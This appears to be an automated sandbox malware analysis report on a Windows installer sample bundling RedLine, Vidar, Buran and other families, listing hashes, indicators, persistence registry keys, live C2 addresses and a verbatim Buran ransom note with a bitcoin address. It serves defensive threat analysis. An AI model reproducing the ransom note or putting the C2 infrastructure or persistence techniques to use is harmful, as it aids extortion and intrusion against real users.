Overview
overview
10Static
static
Setup (1).exe
windows10_x64
10Setup (10).exe
windows10_x64
10Setup (11).exe
windows10_x64
10Setup (12).exe
windows10_x64
10Setup (13).exe
windows10_x64
10Setup (14).exe
windows10_x64
10Setup (15).exe
windows10_x64
10Setup (16).exe
windows10_x64
10Setup (17).exe
windows10_x64
10Setup (18).exe
windows10_x64
10Setup (19).exe
windows10_x64
10Setup (2).exe
windows10_x64
10Setup (20).exe
windows10_x64
10Setup (21).exe
windows10_x64
10Setup (22).exe
windows10_x64
10Setup (23).exe
windows10_x64
10Setup (24).exe
windows10_x64
10Setup (25).exe
windows10_x64
10Setup (26).exe
windows10_x64
10Setup (27).exe
windows10_x64
10Setup (28).exe
windows10_x64
10Setup (29).exe
windows10_x64
10Setup (3).exe
windows10_x64
10Setup (30).exe
windows10_x64
10Setup (31).exe
windows10_x64
10Setup (4).exe
windows10_x64
10Setup (5).exe
windows10_x64
10Setup (6).exe
windows10_x64
10Setup (7).exe
windows10_x64
10Setup (8).exe
windows10_x64
10Setup (9).exe
windows10_x64
10Setup.exe
windows10_x64
10Resubmissions
15/10/2024, 15:36
241015-s1zlzasdkc 1001/07/2024, 18:32
240701-w6yteawhmq 1001/07/2024, 14:52
240701-r82wmaxdnd 1001/07/2024, 14:52
240701-r8syqa1dpp 1011/03/2024, 21:22
240311-z8dsssgg58 1001/09/2021, 13:18
210901-5bmxjspa5s 1001/09/2021, 13:04
210901-te4btfspqa 1001/09/2021, 05:12
210901-4wnkwm1p3j 1031/08/2021, 21:47
210831-41rp97dma2 10Analysis
-
max time kernel
1275s -
max time network
1800s -
platform
windows10_x64 -
resource
win10v20210408 -
submitted
24/08/2021, 20:54
Static task
static1
Behavioral task
behavioral1
Sample
Setup (1).exe
Resource
win10v20210410
netsupportredlinetofseevidar24.08937dibild2supertraffv2evasioninfostealerpersistenceransomwareratstealerthemidatrojan
windows10_x64
0 signatures
0 seconds
Behavioral task
behavioral2
Sample
Setup (10).exe
Resource
win10v20210410
burannetsupportredlinesystembcvidar24.08937dibild2supertraffdiscoveryevasioninfostealerpersistenceransomwareratspywarestealerthemidatrojan
windows10_x64
0 signatures
0 seconds
Behavioral task
behavioral3
Sample
Setup (11).exe
Resource
win10v20210408
burangluptebametasploitnetsupportredlinesystembcvidar24.08937dibild2supertraffbackdoordiscoverydropperevasioninfostealerloaderpersistenceransomwareratspywarestealerthemidatrojan
windows10_x64
0 signatures
0 seconds
Behavioral task
behavioral4
Sample
Setup (12).exe
Resource
win10v20210410
gluptebametasploitnetsupportredlinetofseevidar24.08937dibild2supertraffbackdoordiscoverydropperevasioninfostealerloaderpersistenceransomwareratstealerthemidatrojan
windows10_x64
0 signatures
0 seconds
Behavioral task
behavioral5
Sample
Setup (13).exe
Resource
win10v20210408
burangluptebametasploitnetsupportredlinesmokeloadersystembctofseevidar24.08937dibild2supertraffbackdoordiscoverydropperevasioninfostealerloaderpersistenceransomwareratspywarestealerthemidatrojan
windows10_x64
0 signatures
0 seconds
Behavioral task
behavioral6
Sample
Setup (14).exe
Resource
win10v20210410
netsupportredlinetofseevidar24.08dibild2supertraffv2evasioninfostealerpersistenceransomwareratspywarestealerthemidatrojan
windows10_x64
0 signatures
0 seconds
Behavioral task
behavioral7
Sample
Setup (15).exe
Resource
win10v20210410
burangluptebametasploitnetsupportredlinesystembcvidar24.08937dibild2supertraffbackdoordiscoverydropperevasioninfostealerloaderpersistenceransomwareratspywarestealerthemidatrojan
windows10_x64
0 signatures
0 seconds
Behavioral task
behavioral8
Sample
Setup (16).exe
Resource
win10v20210408
netsupportredlinesystembcvidar24.08937supertraffdiscoveryevasioninfostealerpersistenceratspywarestealerthemidatrojan
windows10_x64
0 signatures
0 seconds
Behavioral task
behavioral9
Sample
Setup (17).exe
Resource
win10v20210410
burangluptebametasploitnetsupportredlinesmokeloadersystembctofseevidar24.08937dibild2supertraffbackdoordiscoverydropperevasioninfostealerloaderpersistenceransomwareratspywarestealerthemidatrojan
windows10_x64
0 signatures
0 seconds
Behavioral task
behavioral10
Sample
Setup (18).exe
Resource
win10v20210408
burangluptebametasploitnetsupportredlinesystembcvidar24.08937dibild2supertraffbackdoordiscoverydropperevasioninfostealerloaderpersistenceransomwareratspywarestealerthemidatrojan
windows10_x64
0 signatures
0 seconds
Behavioral task
behavioral11
Sample
Setup (19).exe
Resource
win10v20210410
netsupportredlinetofseevidar24.08937dibild2supertraffevasioninfostealerpersistenceransomwareratstealerthemidatrojan
windows10_x64
0 signatures
0 seconds
Behavioral task
behavioral12
Sample
Setup (2).exe
Resource
win10v20210408
gluptebametasploitnetsupportredlinesystembctofseevidar24.08937supertraffbackdoordiscoverydropperevasioninfostealerloaderpersistenceransomwareratspywarestealerthemidatrojan
windows10_x64
0 signatures
0 seconds
Behavioral task
behavioral13
Sample
Setup (20).exe
Resource
win10v20210410
netsupportredlinesmokeloadertofseevidardibild2supertraffv2backdoordiscoveryevasioninfostealerpersistenceransomwareratspywarestealerthemidatrojanupx
windows10_x64
0 signatures
0 seconds
Behavioral task
behavioral14
Sample
Setup (21).exe
Resource
win10v20210410
netsupportredlinetofseevidar937dibild2supertraffdiscoveryevasioninfostealerpersistenceransomwareratstealerthemidatrojan
windows10_x64
0 signatures
0 seconds
Behavioral task
behavioral15
Sample
Setup (22).exe
Resource
win10v20210408
gluptebametasploitnetsupportredlinesystembctofseevidar24.08937dibild2supertraffbackdoordiscoverydropperevasioninfostealerloaderpersistenceransomwareratspywarestealerthemidatrojan
windows10_x64
0 signatures
0 seconds
Behavioral task
behavioral16
Sample
Setup (23).exe
Resource
win10v20210410
gluptebametasploitnetsupportredlinesmokeloadertofseevidar24.08937dibild2supertraffv2backdoordiscoverydropperevasioninfostealerloaderpersistenceransomwareratspywarestealerthemidatrojan
windows10_x64
0 signatures
0 seconds
Behavioral task
behavioral17
Sample
Setup (24).exe
Resource
win10v20210408
gluptebametasploitredlinesmokeloadertofseevidar24.08937dibild2supertraffbackdoordiscoverydropperevasioninfostealerloaderpersistenceransomwarespywarestealerthemidatrojan
windows10_x64
0 signatures
0 seconds
Behavioral task
behavioral18
Sample
Setup (25).exe
Resource
win10v20210410
gluptebametasploitnetsupportredlinetofseevidardibild2supertraffbackdoordiscoverydropperevasioninfostealerloaderpersistenceransomwareratstealerthemidatrojan
windows10_x64
0 signatures
0 seconds
Behavioral task
behavioral19
Sample
Setup (26).exe
Resource
win10v20210408
gluptebametasploitnetsupportredlinesmokeloadersystembctofseevidar24.08937dibild2supertraffv2backdoordiscoverydropperevasioninfostealerloaderpersistenceratspywarestealerthemidatrojan
windows10_x64
0 signatures
0 seconds
Behavioral task
behavioral20
Sample
Setup (27).exe
Resource
win10v20210410
burangluptebametasploitnetsupportredlinesystembctofseevidar24.08937dibild2supertraffbackdoordiscoverydropperevasioninfostealerloaderpersistenceransomwareratspywarestealerthemidatrojan
windows10_x64
0 signatures
0 seconds
Behavioral task
behavioral21
Sample
Setup (28).exe
Resource
win10v20210410
gluptebametasploitnetsupportredlinetofseevidar24.08dibild2supertraffv2backdoordiscoverydropperevasioninfostealerloaderpersistenceransomwareratspywarestealerthemidatrojan
windows10_x64
0 signatures
0 seconds
Behavioral task
behavioral22
Sample
Setup (29).exe
Resource
win10v20210408
netsupportredlinesystembctofseevidar24.08dibild2supertraffdiscoveryevasioninfostealerpersistenceransomwareratspywarestealerthemidatrojan
windows10_x64
0 signatures
0 seconds
Behavioral task
behavioral23
Sample
Setup (3).exe
Resource
win10v20210410
gluptebametasploitnetsupportredlinevidar24.08937dibild2supertraffv2backdoordiscoverydropperevasioninfostealerloaderransomwareratspywarestealerthemidatrojan
windows10_x64
0 signatures
0 seconds
Behavioral task
behavioral24
Sample
Setup (30).exe
Resource
win10v20210408
netsupportredlinesystembc24.08dibild2supertraffdiscoveryevasioninfostealerpersistenceransomwareratspywarestealerthemidatrojan
windows10_x64
0 signatures
0 seconds
Behavioral task
behavioral25
Sample
Setup (31).exe
Resource
win10v20210410
gluptebametasploitnetsupportredlinetofseevidar24.08dibild2supertraffv2backdoordiscoverydropperevasioninfostealerloaderpersistenceransomwareratspywarestealerthemidatrojan
windows10_x64
0 signatures
0 seconds
Behavioral task
behavioral26
Sample
Setup (4).exe
Resource
win10v20210408
windows10_x64
0 signatures
0 seconds
Behavioral task
behavioral27
Sample
Setup (5).exe
Resource
win10v20210410
netsupportredlinetofseevidar24.08supertraffv2discoveryevasioninfostealerpersistenceransomwareratspywarestealerthemidatrojan
windows10_x64
0 signatures
0 seconds
Behavioral task
behavioral28
Sample
Setup (6).exe
Resource
win10v20210410
gluptebametasploitnetsupportredlinetofseevidar24.08937dibild2supertraffbackdoordiscoverydropperevasioninfostealerloaderpersistenceransomwareratspywarestealerthemidatrojan
windows10_x64
0 signatures
0 seconds
Behavioral task
behavioral29
Sample
Setup (7).exe
Resource
win10v20210408
gluptebametasploitnetsupportredlinesmokeloadersystembctofseevidar24.08dibild2supertraffbackdoordiscoverydropperevasioninfostealerloaderpersistenceransomwareratspywarestealerthemidatrojan
windows10_x64
0 signatures
0 seconds
Behavioral task
behavioral30
Sample
Setup (8).exe
Resource
win10v20210410
gluptebametasploitnetsupportredlinetofseevidar937dibild2supertraffv2backdoordiscoverydropperevasioninfostealerloaderpersistenceransomwareratspywarestealerthemidatrojan
windows10_x64
0 signatures
0 seconds
Behavioral task
behavioral31
Sample
Setup (9).exe
Resource
win10v20210408
burangluptebametasploitnetsupportredlinesmokeloadersystembctofseevidar24.08dibild2supertraffbackdoordiscoverydropperevasioninfostealerloaderpersistenceransomwareratspywarestealerthemidatrojan
windows10_x64
0 signatures
0 seconds
Behavioral task
behavioral32
Sample
Setup.exe
Resource
win10v20210410
gluptebametasploitnetsupportredlinetofseevidar24.08937dibild2supertraffbackdoordiscoverydropperevasioninfostealerloaderpersistenceransomwareratspywarestealerthemidatrojan
windows10_x64
0 signatures
0 seconds
General
-
Target
Setup (18).exe
-
Size
631KB
-
MD5
cb927513ff8ebff4dd52a47f7e42f934
-
SHA1
0de47c02a8adc4940a6c18621b4e4a619641d029
-
SHA256
fd5c970806fba1500cbb6af5328329aeb43b8de3f02d90ec5d8cd1d57711622f
-
SHA512
988c8fd886a9155b7d190faf2ce6b34d910efcffcf1c6251f18a9d0c804a0ea26a89679273033ac98b200363c536426efd1ae9de445c34e660369abb06f0071c
Malware Config
Extracted
Path
C:\!!! ALL YOUR FILES ARE ENCRYPTED !!!.TXT
Family
buran
Ransom Note
!!! ALL YOUR FILES ARE ENCRYPTED !!!
All your files, documents, photos, databases and other important files are encrypted.
You are not able to decrypt it by yourself! The only method of recovering files is to purchase an unique private key.
Only we can give you this key and only we can recover your files.
PAY FAST 500$=0.013 btc
or the price will increase tomorrow
bitcoin address
bc1qqxnp9z0ff8x852dyflp5r9r6rzse8jl5hzmqz8
To be sure we have the decryptor and it works you can send an email: [email protected] and decrypt one file for free.
But this file should be of not valuable!
Do you really want to restore your files?
[email protected]
TELEGRAM @ payfast290
Your personal ID: 106-7DA-F8B
Attention!
* Do not rename encrypted files.
* Do not try to decrypt your data using third party software, it may cause permanent data loss.
* Decryption of your files with the help of third parties may cause increased price (they add their fee to our) or you can become a victim of a scam.
Extracted
Family
redline
Botnet
supertraff
C2
135.148.139.222:1494
Extracted
Family
redline
Botnet
24.08
C2
95.181.172.100:55640
Extracted
Family
redline
Botnet
dibild2
C2
135.148.139.222:1494
Extracted
Family
vidar
Version
40.1
Botnet
937
C2
https://eduarroma.tumblr.com/
Attributes
-
profile_id
937
Extracted
Family
metasploit
Version
windows/single_exec
Signatures
-
Buran
Ransomware-as-a-service based on the VegaLocker family first identified in 2019.
-
Glupteba Payload 1 IoCs
resource yara_rule behavioral10/memory/2304-415-0x0000000005290000-0x0000000005BB6000-memory.dmp family_glupteba -
MetaSploit
Detected malicious payload which is part of the Metasploit Framework, likely generated with msfvenom or similar.
-
NetSupport
NetSupport is a remote access tool sold as a legitimate system administration software.
-
Process spawned unexpected child process 4 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
description pid pid_target Process procid_target Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 312 4808 rundll32.exe 136 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 7112 4808 rundll32.exe 136 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 9056 4808 rundll32.exe 136 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 9720 4808 rundll32.exe 136 -
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
-
RedLine Payload 8 IoCs
resource yara_rule behavioral10/files/0x000100000001ab7f-127.dat family_redline behavioral10/files/0x000100000001ab7f-178.dat family_redline behavioral10/memory/4712-323-0x0000000005370000-0x000000000586E000-memory.dmp family_redline behavioral10/memory/4712-298-0x000000000041A76A-mapping.dmp family_redline behavioral10/memory/4704-297-0x000000000041A616-mapping.dmp family_redline behavioral10/memory/4712-295-0x0000000000400000-0x0000000000420000-memory.dmp family_redline behavioral10/memory/4704-294-0x0000000000400000-0x0000000000420000-memory.dmp family_redline behavioral10/memory/1584-372-0x000000000041A61A-mapping.dmp family_redline -
Suspicious use of NtCreateProcessExOtherParentProcess 4 IoCs
description pid Process procid_target PID 1852 created 4080 1852 WerFault.exe 78 PID 6928 created 2832 6928 WerFault.exe 83 PID 6636 created 736 6636 WerFault.exe 236 PID 7432 created 6568 7432 WerFault.exe 205 -
Checks for common network interception software 1 TTPs
Looks in the registry for tools like Wireshark or Fiddler commonly used to analyze network activity.
-
Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
-
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs
-
Vidar Stealer 2 IoCs
resource yara_rule behavioral10/memory/2832-390-0x0000000002E90000-0x0000000002F2D000-memory.dmp family_vidar behavioral10/memory/2832-413-0x0000000000400000-0x0000000002D1A000-memory.dmp family_vidar -
Blocklisted process makes network request 64 IoCs
flow pid Process 387 7276 rundll32.exe 468 7772 RUNDLL32.EXE 478 7772 RUNDLL32.EXE 480 7772 RUNDLL32.EXE 482 7772 RUNDLL32.EXE 484 7772 RUNDLL32.EXE 486 7772 RUNDLL32.EXE 487 7772 RUNDLL32.EXE 488 7772 RUNDLL32.EXE 489 7772 RUNDLL32.EXE 490 7772 RUNDLL32.EXE 491 7772 RUNDLL32.EXE 492 7772 RUNDLL32.EXE 494 7772 RUNDLL32.EXE 498 7772 RUNDLL32.EXE 499 7772 RUNDLL32.EXE 501 7772 RUNDLL32.EXE 503 7772 RUNDLL32.EXE 505 7772 RUNDLL32.EXE 506 7772 RUNDLL32.EXE 507 7772 RUNDLL32.EXE 509 7772 RUNDLL32.EXE 510 7772 RUNDLL32.EXE 513 7772 RUNDLL32.EXE 515 7772 RUNDLL32.EXE 517 7772 RUNDLL32.EXE 522 7772 RUNDLL32.EXE 529 7772 RUNDLL32.EXE 530 7772 RUNDLL32.EXE 533 7772 RUNDLL32.EXE 534 7772 RUNDLL32.EXE 536 7772 RUNDLL32.EXE 541 7772 RUNDLL32.EXE 542 7772 RUNDLL32.EXE 543 7772 RUNDLL32.EXE 545 7772 RUNDLL32.EXE 548 7772 RUNDLL32.EXE 552 7772 RUNDLL32.EXE 553 7772 RUNDLL32.EXE 554 7772 RUNDLL32.EXE 555 7772 RUNDLL32.EXE 558 7772 RUNDLL32.EXE 561 7772 RUNDLL32.EXE 563 7772 RUNDLL32.EXE 564 7772 RUNDLL32.EXE 566 7772 RUNDLL32.EXE 568 7772 RUNDLL32.EXE 569 7772 RUNDLL32.EXE 572 7772 RUNDLL32.EXE 574 7772 RUNDLL32.EXE 575 7772 RUNDLL32.EXE 577 7772 RUNDLL32.EXE 579 7772 RUNDLL32.EXE 580 7772 RUNDLL32.EXE 583 7772 RUNDLL32.EXE 592 7772 RUNDLL32.EXE 593 7772 RUNDLL32.EXE 597 7772 RUNDLL32.EXE 598 7772 RUNDLL32.EXE 568 7772 RUNDLL32.EXE 593 7772 RUNDLL32.EXE 616 7772 RUNDLL32.EXE 583 7772 RUNDLL32.EXE 629 7772 RUNDLL32.EXE -
Downloads MZ/PE file
-
Drops file in Drivers directory 4 IoCs
description ioc Process File opened for modification C:\Windows\system32\drivers\etc\hosts MicrosoftEdgeCP.exe File opened for modification C:\Windows\System32\drivers\SET938F.tmp DrvInst.exe File created C:\Windows\System32\drivers\SET938F.tmp DrvInst.exe File opened for modification C:\Windows\System32\drivers\tap0901.sys DrvInst.exe -
Executes dropped EXE 64 IoCs
pid Process 4048 J6iNDogrvenIPg_ZJWx6UAoJ.exe 4080 1a1m9aAFlQn4YP10h3KeKWnZ.exe 412 CLgPUq5AVvZwY3l8lxZ97G9O.exe 3648 7GDU9OSLAivD45PaJ_Np6yTw.exe 3668 Hooe672OqdQEz4Znx7iSvZOE.exe 1596 mMYCkNeRpztI34hbp8udunJt.exe 2724 1GK5k3xmn3O_fPhUrAXhez54.exe 416 po04WAP4mZxGKoA0vPcy97Tk.exe 2832 w5imdGd9mfkpFoQNpJG6TmYK.exe 940 mG4d8IwTgRrAL4FE5iY8YRB7.exe 3420 sJmbQWB0NpkfM_pWcJqhL9vW.exe 1328 Jio2aWKJp8cWMZdrGeQ8KEbN.exe 1156 yoC0SuaMrORdRlbsDHFHyeUd.exe 688 ZilQa116kCxMyJ4DYppJKSNT.exe 3712 7SrzRNSSzQZ1yRbsPelarolG.exe 3732 gAScRkDwlUWDTNNmOfKcnrA7.exe 2808 _bBir4fW40ZAieqy4xVVVqdZ.exe 3832 _fo2akGzHM8e3HDnYwqptuNS.exe 4056 j6dICuruH5OX6Xd08n6Q5qCn.exe 1360 r7KWMen_6LYljFTXNU21pyHC.exe 908 EVawsdwdyWR8sahgToN8uJ5E.exe 2844 9uYgZkgS3XwN7z_tehB60XIr.exe 2460 1AKUBdPthFtxYU_pWBTh89Pm.exe 2304 R7_uP7PjfaAYreXfglrgrLLX.exe 3260 llVVu0HlsK1Kw5wuGRgoKpD7.exe 4140 j6dICuruH5OX6Xd08n6Q5qCn.tmp 4704 ZilQa116kCxMyJ4DYppJKSNT.exe 4712 7SrzRNSSzQZ1yRbsPelarolG.exe 4640 Setup.tmp 4724 md8_8eus.exe 4764 jooyu.exe 4948 1AKUBdPthFtxYU_pWBTh89Pm.exe 1584 _fo2akGzHM8e3HDnYwqptuNS.exe 4720 J6iNDogrvenIPg_ZJWx6UAoJ.exe 5048 6329368.exe 5052 Setup.exe 4788 1024372.exe 3144 8222320.exe 4744 8195904.exe 5192 6774205.exe 5760 WO~L~OYJWS8EVL1.eXe 6044 Stats.exe 6084 mask_svc.exe 6128 Conhost.exe 5152 Cleaner Installation.exe 572 Lx1ZUHXJ3OrL_roz81lD9EQ3.tmp 4536 Stats.tmp 4116 VPN.exe 5296 Inlog.tmp 5244 PBrowFile15.exe 5376 11111.exe 5436 zhaoy-game.exe 5512 xtect12.exe 5584 MediaBurner2.exe 5616 WEATHER Manager.tmp 5624 VPN.tmp 5836 11111.exe 6136 MediaBurner2.tmp 6120 jfiag3g_gg.exe 2748 WinHoster.exe 6100 11111.exe 2204 GcleanerEU.exe 2204 GcleanerEU.exe 6324 zhaoy-game.exe -
Modifies extensions of user files 1 IoCs
Ransomware generally changes the extension on encrypted files.
description ioc Process File opened for modification C:\Users\Admin\Pictures\MergeSearch.tiff spoolsv.exe -
Checks BIOS information in registry 2 TTPs 24 IoCs
BIOS information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion EVawsdwdyWR8sahgToN8uJ5E.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion LMWBld729vM0NLcjGUIXs50T.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion ZFsgv3ebJ4tVSQycSj7b1ZVv.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 1EE4.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion llVVu0HlsK1Kw5wuGRgoKpD7.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion llVVu0HlsK1Kw5wuGRgoKpD7.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion jyGoXTSknssMRF52BzVwSycd.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion hSuVUnsWY7mz347tCpvO6Hm7.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion hSuVUnsWY7mz347tCpvO6Hm7.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion UpdateCore.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion sJmbQWB0NpkfM_pWcJqhL9vW.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion Jio2aWKJp8cWMZdrGeQ8KEbN.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion EVawsdwdyWR8sahgToN8uJ5E.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion jyGoXTSknssMRF52BzVwSycd.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion LMWBld729vM0NLcjGUIXs50T.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion ZFsgv3ebJ4tVSQycSj7b1ZVv.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion F6F7.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion Update.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion UpdateCore.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion sJmbQWB0NpkfM_pWcJqhL9vW.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion Jio2aWKJp8cWMZdrGeQ8KEbN.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion F6F7.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 1EE4.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion Update.exe -
Checks computer location settings 2 TTPs 3 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000\Control Panel\International\Geo\Nation Setup (18).exe Key value queried \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000\Control Panel\International\Geo\Nation xtect12.exe Key value queried \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000\Control Panel\International\Geo\Nation cmd.exe -
Drops startup file 2 IoCs
description ioc Process File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\fastsystem2021.exe Setup.tmp File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\fastsystem2021.exe Setup.tmp -
Loads dropped DLL 64 IoCs
pid Process 940 mG4d8IwTgRrAL4FE5iY8YRB7.exe 4140 j6dICuruH5OX6Xd08n6Q5qCn.tmp 4140 j6dICuruH5OX6Xd08n6Q5qCn.tmp 5152 Cleaner Installation.exe 5296 Inlog.tmp 5296 Inlog.tmp 4536 Stats.tmp 4536 Stats.tmp 5616 WEATHER Manager.tmp 5616 WEATHER Manager.tmp 5624 VPN.tmp 5624 VPN.tmp 6136 MediaBurner2.tmp 5592 Setup.exe 2832 w5imdGd9mfkpFoQNpJG6TmYK.exe 2832 w5imdGd9mfkpFoQNpJG6TmYK.exe 4640 Setup.tmp 5044 uPRmADkV8NoeUbejA2tfPDg_.exe 7276 rundll32.exe 7276 rundll32.exe 6744 Setup.exe 7944 rundll32.exe 6348 Setup.tmp 6348 Setup.tmp 6348 Setup.tmp 6348 Setup.tmp 6348 Setup.tmp 6348 Setup.tmp 6348 Setup.tmp 6348 Setup.tmp 572 Lx1ZUHXJ3OrL_roz81lD9EQ3.tmp 572 Lx1ZUHXJ3OrL_roz81lD9EQ3.tmp 1040 taskkill.exe 7772 RUNDLL32.EXE 7772 RUNDLL32.EXE 7088 fGo2SwgVDQo0h419nKTWto4E.exe 7088 fGo2SwgVDQo0h419nKTWto4E.exe 5952 RUNDLL32.EXE 8760 GameBoxWin64.exe 8760 GameBoxWin64.exe 5556 MsiExec.exe 5556 MsiExec.exe 5556 MsiExec.exe 7408 MsiExec.exe 7408 MsiExec.exe 9168 rundll32.exe 9168 rundll32.exe 8760 GameBoxWin64.exe 7916 Conhost.exe 6960 1EE4.exe 8884 MsiExec.exe 8884 MsiExec.exe 9632 MsiExec.exe 9632 MsiExec.exe 9632 MsiExec.exe 9632 MsiExec.exe 9632 MsiExec.exe 9632 MsiExec.exe 9632 MsiExec.exe 9632 MsiExec.exe 9632 MsiExec.exe 9632 MsiExec.exe 8848 RUNDLL32.EXE 8848 RUNDLL32.EXE -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
resource yara_rule behavioral10/files/0x000100000001ab8f-150.dat themida behavioral10/files/0x000100000001ab86-149.dat themida behavioral10/files/0x0002000000015653-175.dat themida behavioral10/files/0x000100000001ab86-193.dat themida behavioral10/memory/3420-246-0x0000000000AA0000-0x0000000000AA1000-memory.dmp themida behavioral10/memory/1328-250-0x0000000000F00000-0x0000000000F01000-memory.dmp themida behavioral10/memory/3260-247-0x0000000000180000-0x0000000000181000-memory.dmp themida behavioral10/files/0x0002000000015653-205.dat themida behavioral10/files/0x000200000001ab7c-204.dat themida behavioral10/files/0x000100000001ab8f-195.dat themida behavioral10/memory/908-260-0x0000000000F70000-0x0000000000F71000-memory.dmp themida behavioral10/files/0x000200000001ab7c-186.dat themida -
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Adds Run key to start application 2 TTPs 8 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\Weather = "C:\\Users\\Admin\\AppData\\Roaming\\Weather\\Weather.exe --M3yPGhgtKO" Weather_Installation.exe Set value (str) \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000\Software\Microsoft\Windows\CurrentVersion\Run\WinHost = "C:\\Users\\Admin\\AppData\\Roaming\\WinHost\\WinHoster.exe" 8222320.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\system recover = "\"C:\\Program Files (x86)\\GameBox INC\\Fymabivuhi.exe\"" MicrosoftEdgeCP.exe Key created \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000\Software\Microsoft\Windows\CurrentVersion\Run BC.exe Set value (str) \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000\Software\Microsoft\Windows\CurrentVersion\Run\spoolsv.exe = "\"C:\\Users\\Admin\\AppData\\Roaming\\Microsoft\\Windows\\spoolsv.exe\" -start" BC.exe Key created \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000\Software\Microsoft\Windows\CurrentVersion\Run aipackagechainer.exe Set value (str) \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000\Software\Microsoft\Windows\CurrentVersion\Run\ aipackagechainer.exe Key created \REGISTRY\MACHINE\Software\WOW6432Node\Microsoft\Windows\CurrentVersion\Run Weather_Installation.exe -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
description ioc Process Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA 1EE4.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA Update.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA sJmbQWB0NpkfM_pWcJqhL9vW.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA hSuVUnsWY7mz347tCpvO6Hm7.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA LMWBld729vM0NLcjGUIXs50T.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA ZFsgv3ebJ4tVSQycSj7b1ZVv.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA jyGoXTSknssMRF52BzVwSycd.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA F6F7.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA UpdateCore.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA Jio2aWKJp8cWMZdrGeQ8KEbN.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA llVVu0HlsK1Kw5wuGRgoKpD7.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA 